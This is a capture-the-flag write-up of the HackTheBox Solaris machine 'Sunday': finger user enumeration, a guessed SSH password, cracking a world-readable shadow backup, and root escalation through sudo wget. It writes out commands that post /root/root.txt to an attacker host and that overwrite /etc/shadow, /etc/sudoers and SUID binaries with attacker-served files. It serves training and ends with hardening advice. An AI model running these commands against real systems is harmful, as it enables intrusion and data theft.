sunday

OS: Solaris (SunOS 5.11 snv_111b)
Domain / vhosts: none

Summary

Sunday is the lone Solaris box in the HTB Easy tier — and its name is a hint: the default root of the attack is that sunny’s password is literally sunday. Two services that rarely appear on modern targets drive the chain: finger (port 79) for unauthenticated user enumeration, and a stale /backup/shadow.backup left world-readable on the filesystem.

The kill-chain is: full-port nmap to find SSH on 22022 and finger on 79 → automated finger enumeration discovers users sunny and sammy → password guess (sunny:sunday) gives an initial SSH shell → a world-readable /backup/shadow.backup holds SHA-256 crypt hashes for both users → hashcat cracks sammy’s hash to <SAMMY_PW> → lateral SSH move to sammy → sudo -l reveals sammy can run /usr/bin/wget as root without a password → sudo wget --post-file /root/root.txt exfiltrates the flag without a shell, or any of five additional wget abuse techniques yield a root shell.

The privilege escalation is one of the most instructive on the platform: it illustrates that sudo restricted to a binary does not restrict what that binary can do — wget can read, write, and exfiltrate any file on the system when run as root.

Source attribution

0xdf, “HTB: Sunday” — https://0xdf.gitlab.io/2018/09/29/htb-sunday.html. Primary source. Covers the finger enumeration, sunny:sunday guess, shadow backup crack, and all six sudo wget abuse methods.
IppSec, “Sunday” video walkthrough — https://ippsec.rocks/?#Sunday.
finger-user-enum.pl — https://pentestmonkey.net/tools/user-enumeration/finger-user-enum

Recon

Standard nmap misses Sunday. SSH is on 22022 and the OS fingerprint is Solaris; a default -p- scan is required:

nmap -sT -p- --min-rate=5000 -oN nmap/allports.txt <TARGET>
nmap -sC -sV -p 79,111,22022,65258 -oN nmap/scripts.txt <TARGET>

79/tcp    open  finger    Sun Solaris fingerd
111/tcp   open  rpcbind   2-4 (RPC #100000)
22022/tcp open  ssh       SunSSH 1.3 (protocol 2.0)
65258/tcp open  unknown   (RPC service)

OS banner from the SSH exchange: Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008. SSH on a non-standard high port (22022) combined with the finger service is the recognisable Solaris Easy fingerprint on HTB. finger was standard on SunOS/Solaris and is almost never present on Linux targets.

Finger enumeration

The finger protocol (RFC 1288) exposes the /etc/passwd user list and active login sessions without authentication. Three levels of query:

# who is currently logged in?
finger @<TARGET>

# does this specific user exist?
finger sunny@<TARGET>

# automated sweep against a username wordlist
finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt \
    -t <TARGET>

The automated sweep returns two hits from ~10 000 probes:

sammy@<TARGET>: sammy  pts/2  Sep 27 13:55  10.10.16.26
sunny@<TARGET>: sunny  pts/3  Apr 24 10:48  10.10.14.4

Both sunny and sammy are valid local accounts with active or recent sessions.

Foothold — guessed SSH credential

The username sunny and the machine name Sunday are too close to ignore. SSH is on 22022:

ssh -p 22022 sunny@<TARGET>
# Password: sunday

Oracle Corporation      SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$

The password is the box name. This is exactly the class of default or context-derived credential the Mirai botnet’s dictionary included — simple, memorable, and never changed.

On the live box, home dirs are /home/sunny and /home/sammy (the writeup-canonical Solaris convention /export/home/... applies to other Solaris builds; this HTB box maps /home directly).

Lateral move to sammy — `/backup/shadow.backup`

Enumeration as sunny finds a world-readable backup of the shadow file:

find / -name "*.bak" -o -name "*.backup" -o -name "*shadow*" 2>/dev/null

/backup/shadow.backup

cat /backup/shadow.backup

sammy:$5$Ebkn8jlK$<hash>:6445::::::
sunny:$5$iRMbpnBv$<hash>:17636::::::

The $5$ prefix is SHA-256 crypt (hashcat mode 7400). Both hashes are present; sammy’s hash is uncracked at this point.

Copy the hashes to the attack machine and run hashcat:

hashcat -m 7400 shadow.hashes /usr/share/wordlists/rockyou.txt

sammy’s hash cracks to <SAMMY_PW>. (The sunny hash cracks to sunday, confirming the guessed password.)

Lateral SSH move:

ssh -p 22022 sammy@<TARGET>
# Password: <SAMMY_PW>

user.txt is at /home/sammy/user.txt (mode 640 sammy:root — not in Desktop/ despite the writeup-canonical Solaris path).

Privilege escalation — `sudo wget` abuse

sammy@sunday:~$ sudo -l
User sammy may run the following commands on sunday:
    (root) NOPASSWD: /usr/bin/wget

wget running as root can read and write any file on the system. Six independent techniques yield flag recovery or a root shell.

Method 1 — read root.txt via --input-file (fastest, no listener):

sudo /usr/bin/wget --input-file=/root/root.txt

wget treats each line of the file as a URL. The flag string fails DNS resolution and gets printed verbatim in the error output:

--2026-...--  http://<root_flag_value>/
Resolving <root_flag_value> (<root_flag_value>)... failed: temporary
name resolution failure.
wget: unable to resolve host address '<root_flag_value>'

This is the same primitive as the 7za @listfile trick on Usage — pass a sensitive file as a “list of things to fetch or include,” wget fails, and the failure-message format echoes the file content back. No listener required.

Method 2 — exfiltrate root.txt via --post-file (clean):

On attacker:

nc -lvnp 443

On target:

sudo wget --post-file /root/root.txt http://<ATTACKER>:443/

The flag arrives as the raw POST body at the netcat listener.

Method 3 — overwrite /etc/shadow with crafted content:

Generate a known root password hash, build a replacement shadow file, serve it, and overwrite:

openssl passwd -5 -salt 'abc' 'pwned'    # SHA-256 crypt hash
# craft /tmp/shadow with root entry replaced
sudo wget -O /etc/shadow http://<ATTACKER>/shadow
su -    # authenticate with 'pwned'

Method 4 — overwrite a SUID root binary:

# e.g. /usr/bin/passwd is SUID root
sudo wget -O /usr/bin/passwd http://<ATTACKER>/shell.py
chmod +x /usr/bin/passwd
passwd    # executes as root via SUID

Method 5 — overwrite /etc/sudoers:

# craft sudoers with sammy ALL=(ALL) NOPASSWD: ALL
sudo wget -O /etc/sudoers http://<ATTACKER>/sudoers
sudo su

Method 6 — overwrite /root/troll and race the reset:

sunny has sudo NOPASSWD: /root/troll. A background script resets /root/troll every 5 seconds from /root/troll.original (using Solaris’s GNU tool path /usr/gnu/bin/cat). The race window is narrow but doable:

# as sammy — serve a shell and overwrite troll
sudo wget -O /root/troll http://<ATTACKER>/shell.py
# immediately as sunny — trigger it before the 5-second reset
sudo /root/troll

Any of these methods yields root flag access. Method 2 (--post-file) is the cleanest and requires no file modification on the target.

Why each step worked

finger without access control: the finger daemon on SunOS 5.11 responds to unauthenticated queries with the full user list and active session details. The protocol was designed for open academic networks in the 1970s and has no authentication mechanism. Any valid username from /etc/passwd is enumerable without credentials.
Box-name password (sunny:sunday): default or context-derived passwords are one of the most reliable initial-access vectors on HTB and in the wild. An attacker who knows the system is called “Sunday” will always try sunday as a password for every user.
World-readable shadow backup: /backup/shadow.backup is accessible to all users. Shadow files exist precisely to prevent non-privileged users from reading password hashes. Storing a backup outside /etc/ with permissive permissions defeats the entire protection model.
$5$ SHA-256 crypt is fast to crack: SHA-256 crypt with a 4-character salt (mode 7400 in hashcat) runs at millions of hashes per second on modern GPUs. <SAMMY_PW> is in the top quarter of rockyou. A memory-hard KDF (bcrypt, argon2) would not crack in useful time.
sudo wget with no path/argument restriction: sudo restricts which binary runs as root; it does not restrict what that binary does. wget is a general-purpose network client that can read local files (file://), write arbitrary paths (-O), and send data to attacker servers (--post-file). Restricting a binary in sudoers without auditing all of its capabilities is a false sense of isolation.

Counterfactuals

Disable finger (or restrict it to the loopback). There is no legitimate need for unauthenticated user enumeration on a modern server: inetadm disable svc:/network/finger:default on Solaris.
Change default or context-derived passwords. sunny:sunday is found by any credential-spray tool that incorporates machine names.
Protect shadow backup files: store them in /etc/ under mode 0600 (root-owned), or use encrypted off-system backup. Never leave shadow copies in a world-readable path.
Use bcrypt or SHA-512 with work factor ≥ 10 for system passwords; the $5$ SHA-256 crypt used here is unsuitable for new deployments.
Remove wget from sudoers. If the underlying need is a single script that downloads a fixed URL, point the sudoers entry at that specific wrapper script rather than the interpreter/client itself.

Key Takeaways

Always run a full-port scan (-p-) before concluding a target has nothing interesting. SSH on 22022 and finger on 79 are completely invisible to nmap’s default top-1000-port scan.
finger @<host> is the first command when port 79 is open. It returns active sessions without any credentials. finger-user-enum.pl then sweeps a wordlist for valid usernames in minutes.
Solaris conventions differ from Linux: home directories under /export/home/, GNU tools at /usr/gnu/bin/, SSH server is SunSSH rather than OpenSSH.
sudo <binary> grants the full capability set of that binary as root. Audit what a binary can do, not just what it is named. GTFOBins lists wget as a sudo escalation via --post-file and -O.
A backup file that leaks password hashes is as dangerous as the original /etc/shadow. Any copy of sensitive credentials must be as protected as the original.

References

0xdf, “HTB: Sunday” — https://0xdf.gitlab.io/2018/09/29/htb-sunday.html
IppSec, “Sunday” — https://ippsec.rocks/?#Sunday
finger-user-enum — https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
GTFOBins wget sudo — https://gtfobins.github.io/gtfobins/wget/#sudo
RFC 1288 (The Finger User Information Protocol)